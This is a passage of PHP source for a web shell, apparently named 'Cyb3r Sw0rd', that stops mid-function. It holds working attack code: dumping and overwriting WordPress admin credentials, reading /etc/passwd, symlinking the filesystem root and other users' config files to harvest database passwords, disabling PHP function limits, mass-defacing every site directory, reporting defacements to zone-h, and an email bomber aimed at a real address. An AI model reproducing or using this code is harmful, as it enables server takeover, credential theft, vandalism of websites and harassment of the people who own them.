  662. <input type=\"hidden\" name=\"target\" value=\"$current_dir\"><input type=\"file\" name=\"attach\"/>
  663. <br/>Default Deface <input type=\"checkbox\" name=\"defaultdeface\" value=\"1\">
  664. Safe Deface <input type=\"checkbox\" name=\"safedeface\" value=\"1\"><br/>
  665. <input type=\"hidden\" name=\"upload_option\" value=\"1\">
  666. <input type=\"submit\" value=\">>\"></form>
  667. </div>";
  668. closedir($dp);
  669. echo "</div>";
  670. }
  671. if (get(action)==edit)
  672. {
  673. $file = get(file);
  674. if (file_exists($file))
  675. {
  676.  
  677. $open = htmlspecialchars(file_get_contents($file));
  678. if($open){
  679. $exce_code= $open;
  680. }
  681. $source = post(source);
  682. if(isset($_POST['source']) && isset($_POST['file']))
  683. {
  684. $fp = fopen($file, 'w');
  685. $r = fwrite($fp, $source);
  686. fclose($fp);
  687. echo "File Edited Successfully!";
  688. }
  689.  
  690. echo "<form action=\"?action=".get(action)."&file=$file\" method=\"post\">";
  691. echo "<br/><textarea cols=\"100\" rows=\"20\" name=\"source\"/>$exce_code</textarea><br/>";
  692. echo "<input type=\"hidden\" name=\"file\" value=\"$file\">";
  693. echo "<input type=\"Submit\" name=\"mail\" class=\"submit\" value=\"Save\"></form>";
  694. }
  695. else
  696. {
  697. echo "File not exist!!";
  698. }
  699. }
  700. else if (get(action)==esql)
  701. {
  702. echo "<font color=\"teal\"><b><center>MySQL Connection</center></b></font>";
  703. echo "<form method=\"get\">";
  704. echo "<font color=\"yellow\">Database Host:</font><br/><input name=\"DB_Host\" value=\"localhost\" type=\"text\"><br/>";
  705. echo "<font color=\"yellow\">Database Name:</font><br/><input name=\"DB_Name\" type=\"text\"><br/>";
  706. echo "<font color=\"yellow\">Database User:</font><br/><input name=\"DB_User\" type=\"text\"><br/>";
  707. echo "<font color=\"yellow\">Database Password:</font><br/><input name=\"DB_Pass\" type=\"text\"><br/>";
  708. echo "<font color=\"yellow\">Table Prefix:</font><br/><input name=\"DB_Table\" value=\"wp_\" type=\"text\"><br/>";
  709. echo "<input type=\"hidden\" name=\"action\" value=\"esql_connect\">";
  710. echo "<input type=\"submit\" value=\"Connect\">";
  711. echo "</form>";
  712. }
  713. else if (get(action)==esql_connect)
  714. {
  715. $DB_Name = get(DB_Name);
  716. $DB_User = get(DB_User);
  717. $DB_Host = get(DB_Host);
  718. $DB_Pass = get(DB_Pass);
  719. $table_prefix = get(DB_Table);
  720. $connect = DBconnection($DB_Name, $DB_User, $DB_Host, $DB_Pass);
  721. if (!$connect)
  722. {
  723. echo "Error connect to database!!<br/>";
  724. }
  725. else
  726. {
  727. echo "<center><font color=\"green\"><b>Successfully Kissed the Database, Ready For Fuck!! ;)</b></font></center><br/><br/>";
  728. $site = mysql_fetch_array(mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name='siteurl'"));
  729. $sitename = $site[0];
  730. $sql = "SELECT ID, user_login, user_pass FROM ".$table_prefix."users ORDER BY ID LIMIT 0, 10";
  731. $items = mysql_query($sql);
  732.  
  733. if(mysql_num_rows($items)>0)
  734. {
  735. while ($item = mysql_fetch_array($items))
  736. {
  737. echo "<font color=\"blue=\">ID -</font> <font color=\"green\">$item[0]</font>
  738. <font color=\"blue=\">Username-</font> <font color=\"green\">$item[1]</font>
  739. <font color=\"blue=\">Password-</font> <font color=\"green\">$item[2]</font> <br/>";
  740. }
  741. }
  742. else
  743. {
  744. echo "<font color=\"red\">No user Found For Fuck baby!!! Try Again :)!!<br/></font>";
  745. }
  746. echo "<font color=\"green\">Site Name:</font> <font color=\"red\">$sitename</font><br/>";
  747. echo "<font color=\"blue=\"><b>Change User Details:</b></font><br/>";
  748. echo "<form action=\"?action=".get(action)."&DB_Name=$DB_Name&DB_User=$DB_User&DB_Host=$DB_Host&DB_Pass=$DB_Pass&DB_Table=$table_prefix&donow=change_admin_quik\" method=\"post\">";
  749. echo "<font color=\"yellow\">Login Name:</font><br/><input name=\"username\" value=\"admin\" type=\"text\"><br/>";
  750. echo "<font color=\"yellow\">Password:</font><br/><input name=\"pass\" type=\"text\"><br/>";
  751. echo "<font color=\"yellow\">ID:</font><br/><input name=\"id\" type=\"text\"><br/>";
  752. echo "<input type=\"submit\" value=\"Change\">";
  753. echo "</form>";
  754. if (get(donow)==change_admin_quik)
  755. {
  756. $username = post(username);
  757. $pass = post(pass);
  758. $id = post(id);
  759. $password = md5($pass);
  760. $res = mysql_query("UPDATE ".$table_prefix."users SET user_login='".$username."', user_pass='".$password."' WHERE ID='".$id."'");
  761. if ($res)
  762. {
  763. echo "<font color=\"yellow\">Admin ID &amp; Password Updated Successfully!<br/>";
  764. echo "<form name=\"loginform\" id=\"loginform\" target=\"_blank\" action=\"$sitename/wp-login.php\" method=\"post\">
  765. <input type=\"hidden\" name=\"log\" id=\"user_login\" class=\"input\" value=\"".$username."\" size=\"20\" tabindex=\"10\" />
  766. <input type=\"hidden\" name=\"pwd\" id=\"user_pass\" class=\"input\" value=\"".$pass."\" size=\"20\" tabindex=\"20\" /></label>
  767. <input type=\"submit\" name=\"wp-submit\" id=\"wp-submit\" class=\"button-primary\" value=\"Log In\" tabindex=\"100\" />
  768. <input type=\"hidden\" name=\"redirect_to\" value=\"$sitename/wp-admin/\" /><input type=\"hidden\" name=\"testcookie\" value=\"1\" />
  769. </form>";
  770. }
  771. else
  772. {
  773. echo "<font color=\"red\">Error try again!</font>";
  774. }
  775.  
  776. }
  777.  
  778. }
  779. }
  780. else if (get(action)==killme)
  781. {
  782. echo "<font color=\"green\"><b>Do You want to kill this shell?? </b></font> <a href=\"?action=".get(action)."&kill=yes\"><font color=\"red\"><b>Yes</b></font></a> <a href=\"?\"><font color=\"red\"><b>No</b></font></a>";
  783. if (get(kill)==yes)
  784. {
  785. echo "<br/><font color=\"green\"><b>Shell Destroyed Successfully </b></font><br/>";
  786. echo "<font color=\"red\">".currentfile()."</font><font color=\"#FFF\"> Removed Successfully </font><br/>";
  787. if (get('dir')=="")
  788. {
  789. $current_dir = str_replace("\\",'/',getcwd());
  790. }
  791. else
  792. {
  793. $current_dir = get('dir');
  794. }
  795. unlink (currentfile());
  796. }
  797. }
  798. if (isset($_GET['action']) && $_GET['action']=='symlink')
  799. {
  800. echo base64_decode('PGRpdiBjbGFzcz1hY3Rpb25ib3g+PGNlbnRlcj48Zm9udCBjb2xvcj0jRkZGPjxiPlN5bWxpbms8L2I+PC9mb250PjwvY2VudGVyPjxmb3JtIG1ldGhvZD1wb3N0PiYjODIyNjsgR2VuZXJhdGUgQSBOZXcgcGhwLmluaSBGaWxlPGJyLz4NCjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPWluaSB2YWx1ZT0iR2VuZXJhdGUiIC8+PC9mb3JtPjxici8+DQo8Zm9ybSBtZXRob2Q9cG9zdD4mIzgyMjY7IEdldCBVc2VybmFtZXM8YnIvPg0KPGlucHV0IHR5cGU9c3VibWl0IG5hbWU9InVzcmUiIHZhbHVlPSJFeHRyYWN0IHVzZXJuYW1lcyIgLz48L2Zvcm0+');
  801. if(isset($_POST['ini']))
  802. {
  803. $r=fopen('php.ini','w');
  804. $rr=" disbale_functions=none ";
  805. fwrite($r,$rr);
  806. $link= base64_decode("cGhwLmluaSBnZW5lcmF0ZWQgc3VjY2Vzc2Z1bGx5ISA8YnIvPjxhIHRhcmdldD1fYmxhbmsgaHJlZj1waHAuaW5pPlZpZXcgcGhwLmluaTwvYT4=");
  807. echo base64_decode($result);
  808. echo $link;
  809. echo base64_decode($endover);
  810. }
  811. if(isset($_POST['usre'])){
  812. echo base64_decode("PGZvcm0gbWV0aG9kPXBvc3Q+PHRleHRhcmVhIHJvd3M9MTAgY29scz01MCBuYW1lPXVzZXI+");
  813. $users=file("/etc/passwd");
  814. foreach($users as $user)
  815. {
  816. $str=explode(":",$user);
  817. echo $str[0]."\n";
  818. }
  819. echo base64_decode("PC90ZXh0YXJlYT48YnI+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPXN1IHZhbHVlPSdHZXQgQ29uZmlnYXJhdGlvbnMnIC8+PC9mb3JtPg==");
  820. }
  821. echo base64_decode($endover);
  822. error_reporting(0);
  823. echo base64_decode($result);
  824. if(isset($_POST['su']))
  825. {
  826. mkdir('Cybersword',0777);
  827. mkdir('Cybersword/root',0777);
  828. $rr = "Options all\n DirectoryIndex cyb3rsw0rd.html\n AddType text/plain .php\n AddHandler server-parsed .php\n AddType text/plain .html\n AddHandler txt .html\n Require None\n Satisfy Any";
  829. $g = fopen('Cybersword/.htaccess','w');
  830. fwrite($g,$rr);
  831. $cyb3rsw0rd = symlink("/","Cybersword/root");
  832. echo base64_decode("cm9vdCBkaXJlY3RvcnkgYWNjZXNzZWQgc3VjY2Vzc2Z1bGx5ITxicj48YSB0YXJnZXQ9X2JsYW5rIGhyZWY9Y3liM3JzdzByZC9yb290Lz52aWV3IHJvb3Q8L2E+");
  833. $dir=mkdir('CYBERSWORD',0777);
  834. $r = "Options all\n DirectoryIndex cyb3rsw0rd.html\n AddType text/plain .php\n AddHandler server-parsed .php\n AddType text/plain .html\n AddHandler txt .html\n Require None\n Satisfy Any";
  835. $f = fopen('CYBERSWORD/.htaccess','w');
  836. fwrite($f,$r);
  837. echo base64_decode("PGJyPlNlcnZlciBDb25maWdhcmF0aW9ucyBGaWxlcyBHZW5lcmF0ZWQgU3VjY2Vzc2Z1bGx5ITxicj48YSB0YXJnZXQ9X2JsYW5rIGhyZWY9Q3liM3JTdzByZC8+dmlldyBjb25maWd1cmF0aW9uIGZpbGVzPC9hPg==");
  838. echo base64_decode($endover);
  839. $usr=explode("\n",$_POST['user']);
  840. $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","config.php","inc/config.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
  841. foreach($usr as $uss )
  842. {
  843. $us=trim($uss);
  844. foreach($configuration as $c)
  845. {
  846. $rs="/home/".$us."/public_html/".$c;
  847. $r="CYBERSWORD/".$us."_".$c;
  848. symlink($rs,$r);
  849. }
  850. }
  851. }
  852. }
  853.  
  854. if(isset($_GET['action']) && $_GET['action'] == 'zoneh'){
  855. echo base64_decode('DQo8ZGl2IGNsYXNzPSJhY3Rpb25ib3giPjxzcGFuIHN0eWxlPSJmb250LXNpemU6MzBweDsgZm9udC1mYW1pbHk6Q29taWMgU2FucyBNUzsgY29sb3I6I0ZGRiI+Wm9uZS1oIE1pcnJvciA8L3NwYW4+PC9iPjwvY2VudGVyPjxicj4NCjxmb3JtIGFjdGlvbj0iP2FjdGlvbj16b25lLWgiIG1ldGhvZD0iUE9TVCI+PHRhYmxlPjx0cj48dGQgaGVpZ2h0PSI0NSIgY29sc3Bhbj0iMiI+PGZvcm0gbWV0aG9kPSJwb3N0Ij4NCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkZWZhY2VyIiB2YWx1ZT0iQ3liM3JfU3cwcmQiIC8+PGJyLz4NCjxzZWxlY3QgbmFtZT0iaGFja21vZGUiPg0KPG9wdGlvbiA+LS0tLS0tLS1TRUxFQ1QtLS0tLS0tLTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMSI+a25vd24gdnVsbmVyYWJpbGl0eSAoaS5lLiB1bnBhdGNoZWQgc3lzdGVtKTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMiIgPnVuZGlzY2xvc2VkIChuZXcpIHZ1bG5lcmFiaWxpdHk8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjMiID5jb25maWd1cmF0aW9uIC8gYWRtaW4uIG1pc3Rha2U8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjQiID5icnV0ZSBmb3JjZSBhdHRhY2s8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjUiID5zb2NpYWwgZW5naW5lZXJpbmc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjYiID5XZWIgU2VydmVyIGludHJ1c2lvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iNyIgPldlYiBTZXJ2ZXIgZXh0ZXJuYWwgbW9kdWxlIGludHJ1c2lvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iOCIgPk1haWwgU2VydmVyIGludHJ1c2lvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iOSIgPkZUUCBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMCIgPlNTSCBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMSIgPlRlbG5ldCBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMiIgPlJQQyBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMyIgPlNoYXJlcyBtaXNjb25maWd1cmF0aW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxNCIgPk90aGVyIFNlcnZlciBpbnRydXNpb248L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjE1IiA+U1FMIEluamVjdGlvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMTYiID5VUkwgUG9pc29uaW5nPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxNyIgPkZpbGUgSW5jbHVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxOCIgPk90aGVyIFdlYiBBcHBsaWNhdGlvbiBidWc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjE5IiA+UmVtb3RlIGFkbWluaXN0cmF0aXZlIHBhbmVsIGFjY2VzcyBicnV0ZWZvcmNpbmc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjIwIiA+UmVtb3RlIGFkbWluaXN0cmF0aXZlIHBhbmVsIGFjY2VzcyBwYXNzd29yZCBndWVzc2luZzwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjEiID5SZW1vdGUgYWRtaW5pc3RyYXRpdmUgcGFuZWwgYWNjZXNzIHNvY2lhbCBlbmdpbmVlcmluZzwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjIiID5BdHRhY2sgYWdhaW5zdCBhZG1pbmlzdHJhdG9yKHBhc3N3b3JkIHN0ZWFsaW5nL3NuaWZmaW5nKTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjMiID5BY2Nlc3MgY3JlZGVudGlhbHMgdGhyb3VnaCBNYW4gSW4gdGhlIE1pZGRsZSBhdHRhY2s8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjI0IiA+UmVtb3RlIHNlcnZpY2UgcGFzc3dvcmQgZ3Vlc3Npbmc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjI1IiA+UmVtb3RlIHNlcnZpY2UgcGFzc3dvcmQgYnJ1dGVmb3JjZTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjYiID5SZXJvdXRpbmcgYWZ0ZXIgYXR0YWNraW5nIHRoZSBGaXJld2FsbDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjciID5SZXJvdXRpbmcgYWZ0ZXIgYXR0YWNraW5nIHRoZSBSb3V0ZXI8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjI4IiA+RE5TIGF0dGFjayB0aHJvdWdoIHNvY2lhbCBlbmdpbmVlcmluZzwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjkiID5ETlMgYXR0YWNrIHRocm91Z2ggY2FjaGUgcG9pc29uaW5nPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIzMCIgPk5vdCBhdmFpbGFibGU8L29wdGlvbj4NCjwvc2VsZWN0Pjxici8+DQo8c2VsZWN0IG5hbWU9InJlYXNvbiI+DQo8b3B0aW9uID4tLS0tLS0tLVNFTEVDVC0tLS0tLS0tPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxIiA+SGVoLi4uanVzdCBmb3IgZnVuITwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMiIgPlJldmVuZ2UgYWdhaW5zdCB0aGF0IHdlYnNpdGU8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjMiID5Qb2xpdGljYWwgcmVhc29uczwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iNCIgPkFzIGEgY2hhbGxlbmdlPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSI1IiA+SSBqdXN0IHdhbnQgdG8gYmUgdGhlIGJlc3QgZGVmYWNlcjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iNiIgPlBhdHJpb3Rpc208L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjciID5Ob3QgYXZhaWxhYmxlPC9vcHRpb24+DQo8L3NlbGVjdD4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImFjdGlvbiIgdmFsdWU9InpvbmUtaCI+DQo8Y2VudGVyPjxicj48dGV4dGFyZWEgc3R5bGU9ImNvbG9yOiAjMDA5OTAwOyBiYWNrZ3JvdW5kOnRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA5OTAwOyIgbmFtZT0iZG9tYWluIiBjb2xzPSI2MCIgcm93cz0iOSIgaWQ9ImRvbWFpbnMiPlB1dCBMaXN0IE9mIERvbWFpbnM8L3RleHRhcmVhPg0KPGJyIC8+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgbmFtZT0iTm90aWZ5Tm93VG9ab25lSCIgLz48L2NlbnRlcj4NCjwvZm9ybT48L3RkPjwvdHI+PC90YWJsZT48L2Zvcm0+DQo8L3RkPjwvZGl2Pg==');
  856. }
  857. if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){
  858. if($_POST['NotifyNowToZoneH'])
  859. {
  860. echo '<center>';
  861. ob_start();
  862. $sub = get_loaded_extensions();
  863. if(!in_array("curl", $sub)){die(base64_decode('U29ycnkhIEN1cmwgaXMgbm90IHN1cHBvcnRlZCBpbiB0aGlzIHNlcnZlciE='));}
  864. $hacker = $_POST['defacer'];
  865. $method = $_POST['hackmode'];
  866. $neden = $_POST['reason'];
  867. $site = $_POST['domain'];
  868.  
  869. if (empty($hacker))
  870. {die (base64_decode("RXJyb3IhIFlvdSBtdXN0IGZpbGwgdGhlIG5vdGlmaWVyIG5hbWUh"));}
  871. else if($method == "--------SELECT--------")
  872. {die(base64_decode("RXJyb3IhIFlvdSBtdXN0IHNlbGVjdCBhbnkgbWV0aG9kIQ=="));}
  873. elseif($neden == "--------SELECT--------")
  874. {die(base64_decode("RXJyb3IhIFlvdSBtdXN0IHNlbGVjdCBhbnkgcmVhc29uIQ=="));}
  875. elseif(empty($site))
  876. {die(base64_decode("RXJyb3IhIFlvdSBtdXN0IGVudGVyIHNpdGVzIG5hbWUh"));}
  877. $i = 0;
  878. $sites = explode("\n", $site);
  879. while($i < count($sites))
  880. {
  881. if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
  882. mirror_zoneh("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  883. echo "Site : ".$sites[$i]." Mirrored !\n";
  884. ++$i;
  885. }
  886. echo "Mirror Send Successfully to zone-h!";
  887. }
  888. echo '</center>';
  889. }
  890. if (isset($_GET['action']) && $_GET['action']=='massdeface')
  891. {
  892.  
  893. echo base64_decode($result);
  894. if (isset($_POST['mdir']))
  895. $post_dir = $_POST['mdir'];
  896. $current_dir = $post_dir;
  897. if (isset($_POST['safemod']))
  898. $safe_mod = $_POST['safemod'];
  899. if (!is_dir($post_dir))
  900. {
  901. echo "Directory ".$post_dir." Not Found!";
  902. header ("location: $self");
  903. exit;
  904. }
  905. if (isset($_POST['safemod']) && $_POST['safemod']==1)
  906. echo base64_decode("U2FmZSBEZWZhY2UgQWN0aXZhdGUhPGJyLz48cCBhbGlnbj0nbGVmdCc+");
  907. $items_per_page = 5000;
  908. if (!isset($page)) {$page = 0;}
  909. $total = 0;
  910. $wordcount = strlen($current_dir);
  911. $lastword = substr($current_dir,($wordcount-1),$wordcount);
  912. if ($lastword!='/'||$lastword!='\\')
  913. $readdir = $current_dir."/";
  914. else
  915. $readdir = $current_dir;
  916. if(!($dp = opendir($readdir))) die (base64_decode("RXJyb3IgSW4gT3BlbmluZyBEaXJlY3Rvcnkh"));
  917. $file_array = array();
  918.  
  919. while ($file = readdir ($dp))
  920. {
  921. if(substr($file,0,1) != '.')
  922. {
  923. $file_array[] = $file;
  924. }
  925. }
  926. $file_count = count ($file_array);
  927. sort ($file_array);
  928. if ($file_count > 0)
  929. {
  930. $first_record = $page * $items_per_page;
  931. $last_record = $first_record + $items_per_page;
  932. while (list($fileIndexValue, $file_name) = each ($file_array))
  933. {
  934. if (($fileIndexValue >= $first_record) AND ($fileIndexValue < $last_record))
  935. {
  936. if (is_dir($readdir.$file_name))
  937. {
  938. $fname = $readdir.$file_name."/index.php";
  939. $fname2 = $readdir.$file_name."/index.html";
  940. $mirror_domains = $file_name;
  941. $mirror .= $mirror_domains."\n";
  942. if (isset($_POST['safemod']) && $_POST['safemod']==1)
  943. {
  944. if (file_exists($fname))
  945. {
  946. rename($fname,$readdir.$file_name.'/index2.php');
  947. }
  948. if (file_exists($fname2))
  949. {
  950. rename($fname2,$readdir.$file_name.'/index2.html');
  951. }
  952. }
  953. $dsc = "";
  954. $fp = fopen($readdir.$file_name.'/index.php', 'w');
  955. $r = fwrite($fp, base64_decode($dsc));
  956. fclose($fp);
  957. $fp = fopen($readdir.$file_name.'/index.html', 'w');
  958. $r = fwrite($fp, base64_decode($dsc));
  959. fclose($fp);
  960. echo $file_name."<br/>";
  961.  
  962. $mirror_domains = $file_name;
  963. $mirror .= $mirror_domains."\n";
  964. }
  965. }
  966. }
  967. echo base64_decode("PC9wPg==");
  968. if (base64_decode('JGluZGV4ZWQ='))
  969. {
  970. echo base64_decode('VGhpcyBTaXRlIERlZmFjZWQgU3VjY2Vzc2Z1bGx5IQ==');
  971. echo base64_decode("PGNlbnRlcj48Yj48Zm9udCBjb2xvcj0jRkZGPlpvbmUtSCBNaXJyb3IgU2VuZGVyPC9mb250PjwvYj48L2NlbnRlcj48Zm9ybSBhY3Rpb249Jz9hY3Rpb249em9uZS1oJyBtZXRob2Q9J3Bvc3QnPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2RlZmFjZXInIHZhbHVlPSdDeWIzcl9TdzByZCc+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0naGFja21vZGUnIHZhbHVlPScxJz48aW5wdXQgdHlwZT0naGlkZGVuJyBuYW1lPSdyZWFzb24nIHZhbHVlPScxJz48dGV4dGFyZWEgc3R5bGU9J2NvbG9yOiAjMDA5OTAwOyBiYWNrZ3JvdW5kOnRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA5OTAwOycgbmFtZT0nZG9tYWluJyBjb2xzPSc2MCcgcm93cz0nOScgaWQ9J2RvbWFpbnMnPg==").$mirror.base64_decode("PC90ZXh0YXJlYT48YnIvPjxpbnB1dCB0eXBlPSdzdWJtaXQnIHZhbHVlPSdTZW5kIFRvIFpvbmUtSCcgbmFtZT0nTm90aWZ5Tm93VG9ab25lSCcvPg==");}
  972. }
  973. else{echo base64_decode('VGhlcmUgSXMgYW4gZXJyb3IgdG8gRGVmYWNlbWVudCE=');}
  974. echo "<br/>";
  975. closedir($dp);
  976. echo base64_decode($endover);
  977. }
  978. else if (get(action)==massd)
  979. {
  980. echo "<font color=\"green\"><b>Mass Deface</b></font><br/><br/>";
  981. echo "<form action=\"?action=massdeface\" method=\"post\">";
  982. echo "<font color=\"blue\"><b>Choose Directory:</b></font><br/><input name=\"mdir\" value=\"$current_dir\"><br/>";
  983. echo "<font color=\"blue\"><b>Safe Mode:</b></font><br/><input type=\"checkbox\" name=\"safemod\" value=\"1\"><br/>";
  984. echo "<input type=\"submit\" value=\"Deface\">";
  985. echo "</form>";
  986.  
  987. }
  988. else
  989. if (isset($_GET['action']) && $_GET['action']=='massdeface')
  990. {
  991. echo "<div style=\"background-color:#FFF; \">";
  992. echo base64_decode($result);
  993. if (isset($_POST['mdir']))
  994. $post_dir = $_POST['mdir'];
  995. $current_dir = $post_dir;
  996. if (isset($_POST['safemod']))
  997. $safe_mod = $_POST['safemod'];
  998. if (!is_dir($post_dir))
  999. {
  1000. echo "Directory ".$post_dir." Not Found!";
  1001. header ("location: $self");
  1002. exit;
  1003. }
  1004. if (isset($_POST['safemod']) && $_POST['safemod']==1)
  1005. echo base64_decode("U2FmZSBEZWZhY2UgQWN0aXZhdGUhPGJyLz48cCBhbGlnbj0nbGVmdCc+");
  1006. $items_per_page = 5000;
  1007. if (!isset($page)) {$page = 0;}
  1008. $total = 0;
  1009. $wordcount = strlen($current_dir);
  1010. $lastword = substr($current_dir,($wordcount-1),$wordcount);
  1011. if ($lastword!='/'||$lastword!='\\')
  1012. $readdir = $current_dir."/";
  1013. else
  1014. $readdir = $current_dir;
  1015. if(!($dp = opendir($readdir))) die (base64_decode("RXJyb3IgSW4gT3BlbmluZyBEaXJlY3Rvcnkh"));
  1016. $file_array = array();
  1017.  
  1018. while ($file = readdir ($dp))
  1019. {
  1020. if(substr($file,0,1) != '.')
  1021. {
  1022. $file_array[] = $file;
  1023. }
  1024. }
  1025. $file_count = count ($file_array);
  1026. sort ($file_array);
  1027. if ($file_count > 0)
  1028. {
  1029. $first_record = $page * $items_per_page;
  1030. $last_record = $first_record + $items_per_page;
  1031. while (list($fileIndexValue, $file_name) = each ($file_array))
  1032. {
  1033. if (($fileIndexValue >= $first_record) AND ($fileIndexValue < $last_record))
  1034. {
  1035. if (is_dir($readdir.$file_name))
  1036. {
  1037. $fname = $readdir.$file_name."/index.php";
  1038. $fname2 = $readdir.$file_name."/index.html";
  1039. $mirror_domains = $file_name;
  1040. $mirror .= $mirror_domains."\n";
  1041. if (isset($_POST['safemod']) && $_POST['safemod']==1)
  1042. {
  1043. if (file_exists($fname))
  1044. {
  1045. rename($fname,$readdir.$file_name.'/index2.php');
  1046. }
  1047. if (file_exists($fname2))
  1048. {
  1049. rename($fname2,$readdir.$file_name.'/index2.html');
  1050. }
  1051. }
  1052. $dsc = "";
  1053. $fp = fopen($target.'/index.php', 'w');
  1054. $r = fwrite($fp, base64_decode($dsc));
  1055. fclose($fp);
  1056. $fp = fopen($target.'/index.html', 'w');
  1057. $r .= fwrite($fp, base64_decode($dsc));
  1058. fclose($fp);
  1059. //echo "<font color=\"red\">".$file_name."</font><br/>";
  1060. }
  1061. }
  1062. }
  1063. if ($r)
  1064. {
  1065.  
  1066. echo "<font color=\"green\"><b>Mass Defacement Completed Successfully!</b></font><br/>";
  1067. echo "<center><b><font color=#FFF>Zone-H Mirror Sender</font></b></center><form action='?action=zone-h' method='post'><input type='hidden' name='defacer' value='Cyb3r_Sw0rd'><input type='hidden' name='hackmode' value='1'><input type='hidden' name='reason' value='1'><textarea style='color: #009900; background:transparent; box-shadow: 0px 0px 4px #009900;' name='domain' cols='60' rows='9' id='domains'>".$mirror."</textarea><br/><input type='submit' value='Send To Zone-H' name='NotifyNowToZoneH'/>";}
  1068. }
  1069. else{echo 'There Is an error to Defacement!';}
  1070. echo "<br/>";
  1071. closedir($dp);
  1072. echo base64_decode($endover);
  1073. echo "</div>";
  1074. }
  1075. else if (get(action)==mailbomber)
  1076. {
  1077. echo "<style type=\"text/css\">";
  1078. echo "
  1079. .header{
  1080. position:fixed;
  1081. top:0;
  1082. center:0;
  1083. background-color: #6D472D;
  1084. color: #FFF;
  1085. border-radius: 5px;
  1086. padding:5px 5px;
  1087. width: 100%;
  1088. margin-left: -10px;
  1089. font-family: Comic Sans MS;
  1090. font-weight:bold;
  1091. }
  1092.  
  1093. input,textarea,select
  1094. {
  1095. border:1px solid red;
  1096. background-color: black;
  1097. color:red;
  1098. padding: 5px;
  1099. }
  1100. input:focus,textarea:focus,select:focus
  1101. {
  1102. color: #FFF;
  1103. boredr: 1px solid #B24028;
  1104. }
  1105. ";
  1106. echo "</style>";
  1107. //echo "<div class=\"header\">Cyb3r Sw0rd E-mail Bomber</div><br/>";
  1108. $me = "xleetx_snaper";
  1109. $sitename = $_SERVER["HTTP_HOST"];
  1110. $mymail = strtolower("$me@$sitename");
  1111. echo "<form method=\"post\"><b>Notifier:</b> <input name=\"from\" value=\"xl33tx_sn4p3r\"> <b>Target:</b> <input name=\"to\" value=\"zuck@facebook.com\" maxlength=\"200\" /><br/><b>Subject:</b> <input name=\"subject\" value=\"Mail Kiss By Sn4p3R\" maxlength=\"100\" /> <b>Amount:</b> <input name=\"amount\" value=\"100\" maxlength=\"6\" /><br/><b>Message:</b><br/><textarea cols=\"60\" rows=\"9\" name=\"message\" maxlength=\"50000\"/>Baby! You are Fucked up By xl33tx_sn4p3r!</textarea><br/><input type=\"hidden\" name=\"send\" value=\"1\"><input type=\"Submit\" Value=\"Bomb!\"></form><br/><br/>";
  1112. if (isset($_POST["send"]) && $_POST["send"]==1)
  1113. {
  1114.  
  1115. $email = strtolower($_POST['to']);
